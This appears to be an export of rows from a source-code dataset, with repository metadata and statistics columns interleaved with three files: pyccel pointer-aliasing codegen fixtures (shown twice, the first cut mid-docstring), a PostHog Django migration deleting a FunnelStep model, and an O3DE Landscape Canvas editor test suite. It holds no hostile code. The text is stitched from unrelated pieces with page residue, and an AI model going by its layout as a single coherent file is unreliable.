    """Codegen fixture: alias an existing alias so a pointer (`c`) is created
    from another pointer (`b`) rather than from the allocatable directly.

    NOTE: the exact statement shape is the test subject (pyccel C codegen);
    do not restructure.
    """
    from numpy import array
    a = array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
    b = a
    c = b #pylint:disable=unused-variable
def reassign_pointers():
    """Codegen fixture: re-point an alias — first at the whole array, then at a
    slice — so the generated pointer must be reassignable.

    NOTE: the exact statement shape is the test subject (pyccel C codegen);
    do not restructure.
    """
    from numpy import array
    a = array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
    b = a #pylint:disable=unused-variable
    b = a[1:]
| 23.730769 | 79 | 0.531605 |
def allocatable_to_pointer():
    """Codegen fixture: alias a locally allocated array so `c` must become a
    pointer to the allocatable `a` (statement shape is the test subject)."""
    from numpy import array
    a = array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
    c = a
def pointer_to_pointer():
    """Codegen fixture: create a pointer (`c`) from another pointer (`b`)
    rather than from the allocatable directly (statement shape is the test subject)."""
    from numpy import array
    a = array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
    b = a
    c = b
def reassign_pointers():
    """Codegen fixture: re-point an alias — first at the whole array, then at a
    slice (statement shape is the test subject)."""
    from numpy import array
    a = array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
    b = a
    b = a[1:]
| true | true |
f72376ccbed4c815899d44928f38fb797d9853a2 | 299 | py | Python | posthog/migrations/0049_delete_funnelstep.py | Jujhar/posthog | d4df76250632f84b830b76b0ec48caaafbed568f | [
"MIT"
] | 1 | 2020-07-02T12:25:41.000Z | 2020-07-02T12:25:41.000Z | posthog/migrations/0049_delete_funnelstep.py | Jujhar/posthog | d4df76250632f84b830b76b0ec48caaafbed568f | [
"MIT"
] | 1 | 2020-04-25T13:19:59.000Z | 2020-04-25T13:20:17.000Z | posthog/migrations/0049_delete_funnelstep.py | Jujhar/posthog | d4df76250632f84b830b76b0ec48caaafbed568f | [
"MIT"
] | 1 | 2020-06-24T07:59:41.000Z | 2020-06-24T07:59:41.000Z | # Generated by Django 3.0.3 on 2020-04-21 10:08
from django.db import migrations
class Migration(migrations.Migration):
    # Deletes the FunnelStep model (and its database table).
    # Must run after 0048, which this migration builds on.
    dependencies = [
        ('posthog', '0048_auto_20200420_1051'),
    ]
    operations = [
        migrations.DeleteModel(
            name='FunnelStep',
        ),
    ]
| 17.588235 | 47 | 0.608696 |
from django.db import migrations
class Migration(migrations.Migration):
    # Deletes the FunnelStep model (and its database table).
    # Must run after 0048, which this migration builds on.
    dependencies = [
        ('posthog', '0048_auto_20200420_1051'),
    ]
    operations = [
        migrations.DeleteModel(
            name='FunnelStep',
        ),
    ]
| true | true |
f723770420dd7d271b2a220e8e34b5abf9201f58 | 4,622 | py | Python | AutomatedTesting/Gem/PythonTests/largeworlds/landscape_canvas/TestSuite_Main.py | BreakerOfThings/o3de | f4c59f868c726470ec910623facd836047d059c3 | [
"Apache-2.0",
"MIT"
] | 1 | 2022-03-28T08:06:58.000Z | 2022-03-28T08:06:58.000Z | AutomatedTesting/Gem/PythonTests/largeworlds/landscape_canvas/TestSuite_Main.py | BreakerOfThings/o3de | f4c59f868c726470ec910623facd836047d059c3 | [
"Apache-2.0",
"MIT"
] | null | null | null | AutomatedTesting/Gem/PythonTests/largeworlds/landscape_canvas/TestSuite_Main.py | BreakerOfThings/o3de | f4c59f868c726470ec910623facd836047d059c3 | [
"Apache-2.0",
"MIT"
] | null | null | null | """
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
import pytest
from ly_test_tools.o3de.editor_test import EditorSingleTest, EditorSharedTest, EditorParallelTest, EditorTestSuite
@pytest.mark.parametrize("launcher_platform", ['windows_editor'])
@pytest.mark.parametrize("project", ["AutomatedTesting"])
class TestAutomation(EditorTestSuite):
    """Landscape Canvas editor test suite for the AutomatedTesting project.

    Each nested EditorSharedTest subclass binds one script from
    .EditorScripts as its ``test_module``; EditorTestSuite batches the
    shared tests into a common Editor instance.
    """
    class test_LandscapeCanvas_AreaNodes_DependentComponentsAdded(EditorSharedTest):
        from .EditorScripts import AreaNodes_DependentComponentsAdded as test_module
    class test_LandscapeCanvas_AreaNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
        from .EditorScripts import AreaNodes_EntityCreatedOnNodeAdd as test_module
    class test_LandscapeCanvas_AreaNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
        from .EditorScripts import AreaNodes_EntityRemovedOnNodeDelete as test_module
    class test_LandscapeCanvas_Component_AddedRemoved(EditorSharedTest):
        from .EditorScripts import Component_AddedRemoved as test_module
    class test_LandscapeCanvas_ComponentUpdates_UpdateGraph(EditorSharedTest):
        from .EditorScripts import ComponentUpdates_UpdateGraph as test_module
    class test_LandscapeCanvas_Edit_DisabledNodeDuplication(EditorSharedTest):
        from .EditorScripts import Edit_DisabledNodeDuplication as test_module
    class test_LandscapeCanvas_Edit_UndoNodeDelete_PrefabEntity(EditorSharedTest):
        from .EditorScripts import Edit_UndoNodeDelete_PrefabEntity as test_module
    class test_LandscapeCanvas_GradientMixer_NodeConstruction(EditorSharedTest):
        from .EditorScripts import GradientMixer_NodeConstruction as test_module
    class test_LandscapeCanvas_GradientModifierNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
        from .EditorScripts import GradientModifierNodes_EntityCreatedOnNodeAdd as test_module
    class test_LandscapeCanvas_GradientModifierNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
        from .EditorScripts import GradientModifierNodes_EntityRemovedOnNodeDelete as test_module
    class test_LandscapeCanvas_GradientNodes_DependentComponentsAdded(EditorSharedTest):
        from .EditorScripts import GradientNodes_DependentComponentsAdded as test_module
    class test_LandscapeCanvas_GradientNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
        from .EditorScripts import GradientNodes_EntityCreatedOnNodeAdd as test_module
    class test_LandscapeCanvas_GradientNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
        from .EditorScripts import GradientNodes_EntityRemovedOnNodeDelete as test_module
    # Known failure — tracked upstream; remove the marker once the issue is fixed.
    @pytest.mark.xfail(reason="https://github.com/o3de/o3de/issues/2201")
    class test_LandscapeCanvas_GraphClosed_OnEntityDelete(EditorSharedTest):
        from .EditorScripts import GraphClosed_OnEntityDelete as test_module
    class test_LandscapeCanvas_GraphClosed_OnLevelChange(EditorSharedTest):
        from .EditorScripts import GraphClosed_OnLevelChange as test_module
    class test_LandscapeCanvas_GraphClosed_TabbedGraphClosesIndependently(EditorSharedTest):
        from .EditorScripts import GraphClosed_TabbedGraph as test_module
    class test_LandscapeCanvas_GraphUpdates_UpdateComponents(EditorSharedTest):
        from .EditorScripts import GraphUpdates_UpdateComponents as test_module
    class test_LandscapeCanvas_LayerBlender_NodeConstruction(EditorSharedTest):
        from .EditorScripts import LayerBlender_NodeConstruction as test_module
    class test_LandscapeCanvas_LayerExtenderNodes_ComponentEntitySync(EditorSharedTest):
        from .EditorScripts import LayerExtenderNodes_ComponentEntitySync as test_module
    class test_LandscapeCanvas_NewGraph_CreatedSuccessfully(EditorSharedTest):
        from .EditorScripts import NewGraph_CreatedSuccessfully as test_module
    class test_LandscapeCanvas_Prefab_CreateInstantiate(EditorSharedTest):
        from .EditorScripts import Prefab_CreateInstantiate as test_module
    class test_LandscapeCanvas_ShapeNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
        from .EditorScripts import ShapeNodes_EntityCreatedOnNodeAdd as test_module
    class test_LandscapeCanvas_ShapeNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
        from .EditorScripts import ShapeNodes_EntityRemovedOnNodeDelete as test_module
    class test_LandscapeCanvas_SlotConnections_UpdateComponentReferences(EditorSharedTest):
        from .EditorScripts import SlotConnections_UpdateComponentReferences as test_module
| 52.522727 | 114 | 0.844656 |
import pytest
from ly_test_tools.o3de.editor_test import EditorSingleTest, EditorSharedTest, EditorParallelTest, EditorTestSuite
@pytest.mark.parametrize("launcher_platform", ['windows_editor'])
@pytest.mark.parametrize("project", ["AutomatedTesting"])
class TestAutomation(EditorTestSuite):
    """Landscape Canvas editor test suite; each nested EditorSharedTest binds one
    .EditorScripts module as its ``test_module`` and runs in a shared Editor."""
    class test_LandscapeCanvas_AreaNodes_DependentComponentsAdded(EditorSharedTest):
        from .EditorScripts import AreaNodes_DependentComponentsAdded as test_module
    class test_LandscapeCanvas_AreaNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
        from .EditorScripts import AreaNodes_EntityCreatedOnNodeAdd as test_module
    class test_LandscapeCanvas_AreaNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
        from .EditorScripts import AreaNodes_EntityRemovedOnNodeDelete as test_module
    class test_LandscapeCanvas_Component_AddedRemoved(EditorSharedTest):
        from .EditorScripts import Component_AddedRemoved as test_module
    class test_LandscapeCanvas_ComponentUpdates_UpdateGraph(EditorSharedTest):
        from .EditorScripts import ComponentUpdates_UpdateGraph as test_module
    class test_LandscapeCanvas_Edit_DisabledNodeDuplication(EditorSharedTest):
        from .EditorScripts import Edit_DisabledNodeDuplication as test_module
    class test_LandscapeCanvas_Edit_UndoNodeDelete_PrefabEntity(EditorSharedTest):
        from .EditorScripts import Edit_UndoNodeDelete_PrefabEntity as test_module
    class test_LandscapeCanvas_GradientMixer_NodeConstruction(EditorSharedTest):
        from .EditorScripts import GradientMixer_NodeConstruction as test_module
    class test_LandscapeCanvas_GradientModifierNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
        from .EditorScripts import GradientModifierNodes_EntityCreatedOnNodeAdd as test_module
    class test_LandscapeCanvas_GradientModifierNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
        from .EditorScripts import GradientModifierNodes_EntityRemovedOnNodeDelete as test_module
    class test_LandscapeCanvas_GradientNodes_DependentComponentsAdded(EditorSharedTest):
        from .EditorScripts import GradientNodes_DependentComponentsAdded as test_module
    class test_LandscapeCanvas_GradientNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
        from .EditorScripts import GradientNodes_EntityCreatedOnNodeAdd as test_module
    class test_LandscapeCanvas_GradientNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
        from .EditorScripts import GradientNodes_EntityRemovedOnNodeDelete as test_module
    # Known failure — tracked upstream in o3de/o3de#2201.
    @pytest.mark.xfail(reason="https://github.com/o3de/o3de/issues/2201")
    class test_LandscapeCanvas_GraphClosed_OnEntityDelete(EditorSharedTest):
        from .EditorScripts import GraphClosed_OnEntityDelete as test_module
    class test_LandscapeCanvas_GraphClosed_OnLevelChange(EditorSharedTest):
        from .EditorScripts import GraphClosed_OnLevelChange as test_module
    class test_LandscapeCanvas_GraphClosed_TabbedGraphClosesIndependently(EditorSharedTest):
        from .EditorScripts import GraphClosed_TabbedGraph as test_module
    class test_LandscapeCanvas_GraphUpdates_UpdateComponents(EditorSharedTest):
        from .EditorScripts import GraphUpdates_UpdateComponents as test_module
    class test_LandscapeCanvas_LayerBlender_NodeConstruction(EditorSharedTest):
        from .EditorScripts import LayerBlender_NodeConstruction as test_module
    class test_LandscapeCanvas_LayerExtenderNodes_ComponentEntitySync(EditorSharedTest):
        from .EditorScripts import LayerExtenderNodes_ComponentEntitySync as test_module
    class test_LandscapeCanvas_NewGraph_CreatedSuccessfully(EditorSharedTest):
        from .EditorScripts import NewGraph_CreatedSuccessfully as test_module
    class test_LandscapeCanvas_Prefab_CreateInstantiate(EditorSharedTest):
        from .EditorScripts import Prefab_CreateInstantiate as test_module
    class test_LandscapeCanvas_ShapeNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
        from .EditorScripts import ShapeNodes_EntityCreatedOnNodeAdd as test_module
    class test_LandscapeCanvas_ShapeNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
        from .EditorScripts import ShapeNodes_EntityRemovedOnNodeDelete as test_module
    class test_LandscapeCanvas_SlotConnections_UpdateComponentReferences(EditorSharedTest):
        from .EditorScripts import SlotConnections_UpdateComponentReferences as test_module
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.